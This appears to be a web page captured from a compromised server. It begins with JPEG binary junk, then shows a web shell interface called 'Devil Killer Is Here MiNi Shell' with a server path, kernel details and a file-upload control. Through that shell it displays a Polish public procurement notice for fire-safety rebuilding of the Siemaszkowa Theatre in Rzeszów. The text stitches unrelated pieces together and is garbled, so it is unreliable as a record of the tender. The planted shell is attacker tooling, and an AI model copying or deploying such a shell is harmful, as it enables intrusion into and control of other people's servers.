JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230427/0019664801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa budynku Teatru im. W. Siemaszkowej w Rzeszowie na potrzeby dostosowania do przepisów ppoż. Etap 1 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Teatr im. Wandy Siemaszkowej w Rzeszowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000279775</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Sokoła 7/9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rzeszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">35-010</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 724 601 609</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">j.rozmus@teatr-rzeszow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://teatr-rzeszow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa budynku Teatru im. W. Siemaszkowej w Rzeszowie na potrzeby dostosowania do przepisów ppoż. Etap 1 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3e61873e-e51b-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00196648</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00143366/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa budynku Teatru im. W. Siemaszkowej w Rzeszowie na potrzeby dostosowania do przepisów ppoż. Etap 1</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/teatrrzeszow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">System jest dostępny pod adresem: https://portal.smartpzp.pl/teatrrzeszow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie jest prowadzone w<br/>języku polskim.<br/>2. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert<br/>oraz oświadczeń, odbywa się przy użyciu środków komunikacji elektronicznej zapewnionych przez system zapewniający obsługę<br/>procesu udzielania zamówień publicznych za pośrednictwem środków komunikacji elektronicznej, zwany dalej Systemem.<br/>3. System jest dostępny pod adresem: https://portal.smartpzp.pl/gminakrasne<br/>4. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta w Systemie, ani logowania<br/>do Systemu.<br/>5. Za pośrednictwem posiadanego w Systemie konta Użytkownika Zewnętrznego odbywa się komunikacja Wykonawcy z<br/>Zamawiającym w postępowaniu, w szczególności: przekazywanie dokumentów, oświadczeń, informacji, pytań, wniosków w ramach<br/>postępowania.<br/>6. Za pośrednictwem posiadanego w Systemie konta Jednostki Zamawiającej oraz kont jej Użytkowników Wewnętrznych odbywa się<br/>komunikacja Zamawiającego z Wykonawcą w postępowaniu, w szczególności: przekazywanie wezwań i zawiadomień, informacji,<br/>odpowiedzi na pytania.<br/>7. Składanie wniosków o wyjaśnienie treści SWZ przez Wykonawców odbywa się w zakładce „Pytania do postępowania”. Po<br/>otwarciu ofert, komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz<br/>informacje, przekazywane są za pośrednictwem Systemu, w zakładce „Korespondencja”, która dla Wykonawcy jest widoczna w<br/>zakładce „Oferty”, po zaznaczeniu numeru złożonej oferty. Do pełnego i prawidłowego korzystania z Systemu przez Użytkowników<br/>Zewnętrznych konieczne jest posiadanie przez co najmniej jednego uprawnionego Użytkownika Zewnętrznego Wykonawcy<br/>elektronicznego podpisu kwalifikowanego lub podpisu zaufanego lub podpisu osobistego służącego do autentykacji i podpisu.<br/>8. Szczegółowe informacje na temat wymogów technicznych można znaleźć w rozdziale IX Specyfikacji Warunków Zamówienia<br/>(dalej SWZ)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula RODO stanowi załącznik nr 5 do SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula RODO stanowi załącznik nr 5 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AG-270-1-2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Informacje podstawowe na temat przedmiotu zamówienia.<br/>Przedmiotem zamówienia są roboty budowlane polegające na dostosowaniu budynku Teatru<br/>do przepisów z zakresu bezpieczeństwa pożarowego. Przedmiot zamówienia stanowi Etap 1<br/>realizacji wyżej wymienionego zadania inwestycyjnego. W zakres prac objętych przedmiotem<br/>zamówienia wchodzą roboty ogólnobudowlane, konstrukcyjne, sanitarne i elektryczne.<br/>Przedmiot zamówienia powinien zostać wykonany zgodnie z poniżej przedstawionymi<br/>opracowaniami oraz niniejszym Opisem Przedmiotu Zamówienia (dalej „OPZ”), które łącznie<br/>stanowią „Dokumentację projektową”:<br/>1) Ekspertyza techniczna stanu ochrony przeciwpożarowej – wrzesień 2019, stanowiąca<br/>załącznik nr 1 do OPZ, (dalej „Ekspertyza”),<br/>2) Dokument wydany przez Podkarpackiego Komendanta Wojewódzkiego Państwowej Straży<br/>Pożarnej, tj. Postanowienie z dnia 22.11.2019 r., stanowiące załącznik nr 2 do OPZ,<br/>3) Ekspertyza konstrukcyjno-budowlana budynku siedziby Teatru im. Wandy Siemaszkowej<br/>w Rzeszowie, zlokalizowanego przy ul. Sokoła 7-9 w Rzeszowie, z czerwca 2018 roku,<br/>stanowiąca załącznik nr 3 do OPZ,<br/>4) Projekt budowlany Przebudowy budynku Teatru im. W. Siemaszkowej w Rzeszowie<br/>na potrzeby dostosowania do przepisów ppoż. wraz z poprawą funkcjonalności oraz rysunki<br/>wykonawcze dla zakresu objętego Etapem 1, stanowiące załącznik nr 4 do OPZ,<br/>5) Decyzje administracyjne, stanowiące załącznik nr 5 do OPZ,<br/>6) Specyfikacje techniczne wykonania i odbioru robót, stanowiące załącznik nr 6 do OPZ,<br/>7) Przedmiary robót, stanowiące załącznik nr 7 do OPZ,<br/>i zgodnie z obowiązującymi przepisami i sztuką budowlaną.<br/>2. Jeżeli w SWZ zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca)<br/>materiałów lub normy, aprobaty, specyfikacje i systemy, o których mowa w art. 99 ust. 5 ustawy<br/>Pzp, zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod<br/>warunkiem, że zagwarantują one prawidłową realizację robót oraz zapewnią uzyskanie<br/>parametrów technicznych nie gorszych od założonych w wyżej wymienionych dokumentach<br/>zamówienia.<br/>3. Zgodnie z art. 101 ust. 4 ustawy Pzp w sytuacji, gdyby w dokumentach opisujących przedmiot<br/>zamówienia, zawarto odniesienie do norm, ocen technicznych, aprobat, specyfikacji<br/>technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3<br/>ustawy Pzp, a takim odniesieniom nie towarzyszyło wyrażenie „lub równoważne”,<br/>to Zamawiający dopuszcza rozwiązania równoważne opisywanym w każdej takiej normie,<br/>ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych.<br/>W związku z powyższym należy przyjąć, że każdej: normie, ocenie technicznej, aprobacie,<br/>specyfikacji technicznej, systemowi referencji technicznych występujących w opisie przedmiotu<br/>zamówienia towarzyszą wyrazy „lub równoważne” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45343000-3 - Roboty instalacyjne przeciwpożarowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Oceniane będą wyłącznie oferty nieodrzucone.<br/>2. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującym<br/>kryterium:<br/>Nazwa kryterium Waga %<br/>Cena 60<br/>Okres gwarancji 40<br/>3. Przy ocenie ofert wartość wagowa wyrażona w procentach będzie wyrażona w punktach<br/>(1%=1pkt).<br/>4. Oferty będą oceniane w zakresie kryterium Ceny w odniesieniu do najkorzystniejszych<br/>warunków przedstawionych przez wykonawców w zakresie tego kryterium, wg następującego<br/>wzoru:<br/><br/>Pc=(Cn /Cb) * 60<br/><br/>gdzie:<br/>Pc- liczba punktów w kryterium Cena, jakie wykonawca uzyskał, z dokładnością do dwóch miejsc<br/>po przecinku,<br/>Cn- cena najtańszej oferty niepodlegającej odrzuceniu;<br/>Cb- cena oferty ocenianej niepodlegająca odrzuceniu;<br/>*- znak mnożenia<br/>/-znak dzielenia<br/>5. Oferty będą oceniane w zakresie kryterium Okres gwarancji jakości w odniesieniu<br/>do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie tego<br/>kryterium, wg następującego wzoru:<br/><br/>Pg=( Ogb/Ogn) * 40<br/><br/>Gdzie:<br/>Pg- liczba punktów w kryterium Okres gwarancji jakości , jakie wykonawca uzyskał, z dokładnością<br/>do dwóch miejsc po przecinku;<br/>Ogb- okres gwarancji jakości ocenianej oferty niepodlegającej odrzuceniu;<br/>Ogn- okres gwarancji jakości najdłuższy spośród ocenianych ofert niepodlegających odrzuceniu;<br/>*- znak mnożenia<br/>/-znak dzielenia<br/>Zamawiający będzie oceniał w tym kryterium wyłącznie oferty, w których okres gwarancji jakości<br/>określony zostanie w miesiącach licząc od dnia podpisania protokołu końcowego odbioru robót<br/>budowlanych. Przy czym do oceny ofert w ramach tego kryterium Zamawiający przyjmie<br/>maksymalnie 120 miesięczny okres gwarancji jakości. Oferta wykonawcy, który zaproponuje okres<br/>gwarancji krótszy niż 36 miesiące od dnia podpisania protokołu końcowego odbioru robót<br/>budowalnych, zostanie odrzucona.<br/>6. Ofertom nie odrzuconym zostaną przyznane pkt wg następującego wzoru:<br/>P= Pc + Pg<br/>7. Zamawiający jako najkorzystniejszą ofertę wybierze ofertę wykonawcy, która uzyska najwyższą<br/>ilość punktów w ramach wszystkich kryterium oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki udziału<br/>w postępowaniu, określone przez Zamawiającego w SWZ.<br/>2. Zamawiający wymaga wykazania spełniania następujących warunków określonych w art. 112 ust.<br/>2 ustawy Pzp, dotyczących:<br/>2.1. Zdolności do występowania w obrocie prawnym.<br/> Zamawiający nie określa wyżej wymienionego warunku.<br/>2.2. Sytuacji ekonomicznej lub finansowej<br/> Zamawiający uzna warunek udziału w tym zakresie za spełniony, jeżeli Wykonawca wykaże,<br/>że posiada środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 500.000,00<br/>zł. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek<br/>może być spełniony łącznie przez wszystkich Wykonawców lub przez co najmniej jednego<br/>z Wykonawców.<br/>Zamawiający będzie żądał: informacji banku lub spółdzielczej kasy oszczędnościowo –<br/>kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność<br/>kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>2.3. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie określa wyżej wymienionego warunku.<br/>2.4. Zdolności technicznej lub zawodowej.<br/>Wykonawca powinien wykazać, że w okresie ostatnich 5 lat przed upływem terminu<br/>składania ofert (a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie)<br/>zrealizował robotę budowlaną, która polegała na nadbudowie lub przebudowie lub<br/>rozbudowie lub odbudowie budynku użyteczności publicznej/mieszkalnego<br/>wielorodzinnego, w zakres której wchodziły roboty ogólnobudowlane (w tym konstrukcyjne),<br/>i swoim zakresem obejmowały m.in. wykonanie wzmocnienia konstrukcji budynku a wartość<br/>tej roboty była nie mniejsza niż 400.000,00 zł brutto.<br/>Pod użytymi pojęciami:<br/>„przebudowa” – należy rozumieć definicję określoną w art. 3 pkt. 7a Ustawy z 7 lipca 1994<br/>r. Prawo budowlane (Dz. U. z 2021 r. poz. 2351 ze zm.), dalej „PrBud”.<br/>„rozbudowa” – należy rozumieć rodzaj budowy, w wyniku której powstaje nowa część istniejącego już obiektu budowlanego. W wyniku przeprowadzenia rozbudowy obiektu<br/>budowlanego, zwiększa się jego powierzchnia zabudowy (i powierzchnia użytkowa).<br/>„nadbudowa” – należy rozumieć rodzaj budowy, w wyniku której powstaje nowa część<br/>istniejącego już obiektu budowlanego. W wyniku przeprowadzenia nadbudowy pewnego<br/>obiektu budowlanego, zwiększa się jego wysokość (i powierzchnia użytkowa).<br/>„odbudowa” – należy rozumieć rodzaj budowy, w wyniku której powstaje nowy obiekt<br/>budowlany w miejscu istniejącego wcześniej obiektu, który uległ całkowitemu lub<br/>częściowemu zniszczeniu.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek<br/>musi być przez co najmniej jednego z Wykonawców. Zamawiający nie dopuszcza<br/>sumowania wartości robót w celu wykazania spełnienia tego warunku.<br/>1. Dysponowanie osobami zdolnymi do wykonania zamówienia:<br/>a) co najmniej 1 osobą przeznaczoną do pełnienia funkcji kierownika budowy, posiadającą<br/>uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie<br/>w specjalności konstrukcyjno - budowlanej bez ograniczeń w rozumieniu „PrBud”,<br/>Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie<br/>przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych<br/>w budownictwie (Dz.U. z 2019 r. poz. 831), dalej „RMSFT” oraz ustawy z dnia 15 grudnia<br/>2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz.U.<br/>z 2019 r. poz. 1117), dalej „UOSZ” oraz posiadającą kwalifikacje do prowadzenia robót<br/>budowlanych przy zabytkach nieruchomych określone w art. 37c Ustawy z dnia 23 lipca<br/>2003 r. o ochronie zabytków i opiece nad zabytkami (Dz. U. z 2020 r. poz. 282) - która<br/>przez co najmniej 18 miesięcy brała udział w robotach budowlanych prowadzonych przy<br/>zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego<br/>instytucją kultury, legitymującą się co najmniej 5-letnim doświadczeniem (liczonym<br/>od dnia uzyskania uprawnień) w kierowaniu robotami budowlanymi w powyższej<br/>specjalności, która kierowała co najmniej 2 (dwoma) robotami budowlanymi<br/>polegającymi na nadbudowie lub przebudowie lub rozbudowie lub odbudowie budynku<br/>użyteczności publicznej/mieszkalnego wielorodzinnego, w zakres której wchodziły<br/>roboty ogólnobudowlane (w tym konstrukcyjne), sanitarne, oraz roboty elektryczne<br/>a wartość tej roboty (obejmującej cały wskazany wyżej zakres) była nie mniejsza niż<br/>400.000,00 zł brutto.<br/>b) co najmniej 1 osobą przeznaczoną do pełnienia funkcji koordynatora, legitymującą się<br/>minimum 2 (dwu) letnim doświadczeniem zawodowym w zakresie koordynowania lub<br/>nadzorowania robót związanych z przebudową lub nadbudową lub, rozbudową lub<br/>odbudową budynków użyteczności publicznej/mieszkalnych wielorodzinnych, w ramach<br/>których realizowane były roboty budowlane w branżach: ogólnobudowlana,<br/>konstrukcyjna, sanitarna, elektryczna.<br/>c) co najmniej 1 osobą przeznaczoną do kierowania robotami w branży sanitarnej<br/>posiadającą uprawnienia do wykonywania samodzielnych funkcji w budownictwie<br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,<br/>wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń<br/>w rozumieniu „PrBud”, „RMSFT” oraz „UOSZ”,<br/>d) co najmniej 1 osobą przeznaczoną do kierowania robotami budowlanymi w zakresie prac elektrycznych posiadającą uprawnienia do wykonywania samodzielnych funkcji<br/>technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji<br/>i urządzeń elektrycznych, bez ograniczeń w rozumieniu „PrBud”, „RMSFT” oraz „UOSZ”.<br/>Zamawiający nie dopuszcza łączenia funkcji określonych w pkt a)-d) powyżej.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek<br/>może być spełniony łącznie przez wszystkich Wykonawców lub przez co najmniej jednego<br/>z Wykonawców. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie, o którym<br/>mowa w art. 125 ust. 1 ustawy Pzp Wykonawca składa w formie dokumentu, którego wzór zawiera Załącznik Nr 3 do SWZ.<br/>W przypadku Wykonawcy, który polega na zdolnościach innych podmiotów, Wykonawca także oświadczenie podmiotu<br/>udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków 